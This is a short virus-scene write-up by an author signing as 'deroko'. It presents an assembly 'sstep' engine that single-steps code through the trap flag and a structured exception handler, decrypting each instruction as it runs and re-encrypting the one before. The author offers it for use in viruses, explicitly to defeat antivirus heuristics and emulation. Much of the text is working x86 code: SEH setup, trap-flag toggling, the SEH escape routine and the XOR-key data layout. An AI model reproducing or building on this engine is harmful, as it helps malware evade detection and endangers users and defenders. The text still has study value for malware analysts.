Author: deroko
Ok this is engine used for the first time in viri world in blacky.w2k/xp viri. Idea of this engine is to screw heuristics and emulation one and for all.
Also this engine might be used in some other code where protection is needed. Basicaly this engine works with TRAP FLAG in Eflags register, which will cause exception after each instruction. When exception is generated code will decrypt current instruction and encrypt previous instruction and so on... due to exception whole engine is designed as Structure Exception Handler (SEH)...
Decryption routine is very simple xor with random key which you specify.
This gives us 256 generations of a same viri.
Here is data used with this engine:
imagebase dd 0
- if you are using this from viri don't forget to set this
one to 0 before entering single step, this will be used
to check if EIP is in range (calls to APIs)
prev dd 0
- pointer to prev instruction, also set to 0 before entering
sstep decryption/encryption...
prev_len dd 0
- len of previous instruction, so we don't have to call lde
2 times
buffer db 16 dup(0)
- this is used so instruction can be decoded in separate buffer
and to determine its length so we know how much to decrypt at EIP
opcode dd 0
- used to save opcode when EIP is out-of-imagebase and to insert
int 3h there (just regular step over)
xor_key db 0DEh
- this key is 0DEh only for first generation, you can change it
to something else if you want... (also change runtime.c)
include ldex86bin.inc
- length disassembler engine (written by me) used to fin len of
instructions....
push seh32bin
push dword ptr FS:[0]
mov dword ptr FS:[0], esp
pushfd
or dword ptr[esp], 100h
popfd
jmp __encrypted_code ;(1st instruction ain't traced)
call delta
delta: pop ebp
sub ebp, offset delta
lea eax, [ebp+seh32bin]
push eax
sub eax, eax
push dword ptr FS:[eax]
mov dword ptr FS:[eax], esp
;0 imagebase and prev
mov [ebp+imagebase], eax
mov [ebp+prev], eax
mov eax, 100h
push eax
popfd
jmp __encrypted_code
Also you should "Escape from SEH" b/c whole code ain't crypted... it is achived by setting new SEH handle and clearing trap-flag:
push offset escape_seh
push dword ptr FS:[0]
mov dword ptr FS:[0], esp
__escape:
pop dword ptr FS:[0]
add esp, 4
pop dword ptr FS:[0]
add esp, 4
escape_seh:
mov ebx, dword ptr [esp+0Ch]
and [ebx.CONTEXT_EFlgags], 0FFFFFEFFh ; clean trap flag
mov [ebx.CONTEXT_Eip], offset __escape ; offset of clean code
xor eax, eax
ret
runtime.c is tool created to crypt code, it will scan for strings:
db "START",0 and db "END", 0
START + 0 will be changed with 6x0FFh
END + 0 will be changed with 4x90h
well that's it about sstep engine...
deroko
http://deroko.phearless.org
- sstep.asm <whole engine>
- sstep1.asm <testing bin dump of engine>
- ldex86bin.inc <length disassembler engine - bin dump>
- seh32bin.inc <sstep decryption encryption engine - bin dump>
sorry for ma bad english... it ain't my native language...